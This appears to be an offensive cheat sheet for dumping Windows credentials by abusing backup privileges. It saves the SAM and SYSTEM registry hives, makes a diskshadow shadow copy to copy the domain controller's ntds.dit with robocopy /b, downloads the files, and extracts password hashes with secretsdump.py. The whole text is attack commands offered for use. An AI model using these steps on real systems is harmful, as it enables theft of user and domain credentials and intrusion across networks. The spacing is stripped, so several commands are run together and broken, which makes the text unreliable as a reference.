# check privileges> whoami /priv# copy the sam and system files > cd C:\> mkdir temp> cd C:\temp> reg save hklm\sam c:\Temp\sam> reg save hklm\system c:\Temp\system# file trasnfer> download sam> download system # dump sam secrets locally Kali> secretsdump.py-samsam-systemsystemLOCAL
NTDS
# Create a dsh filevintds.dshsetcontextpersistentnowritersaddvolumec:aliasntdscreateexpose%ntds%z:
# file transfer> cd C:\> mkdir temp> cd C:\temp> upload ntds.dsh# copy ntds.dit > diskshadow /s ntds.dsh> robocopy /b z:\windows\ntds . ntds.dit # copy system > reg save hklm\system c:\Temp\system# file transfer > download ntds.dit > download system # Dump ntds hashes locally secretsdump.py-ntdsntds.dit-systemsystemlocal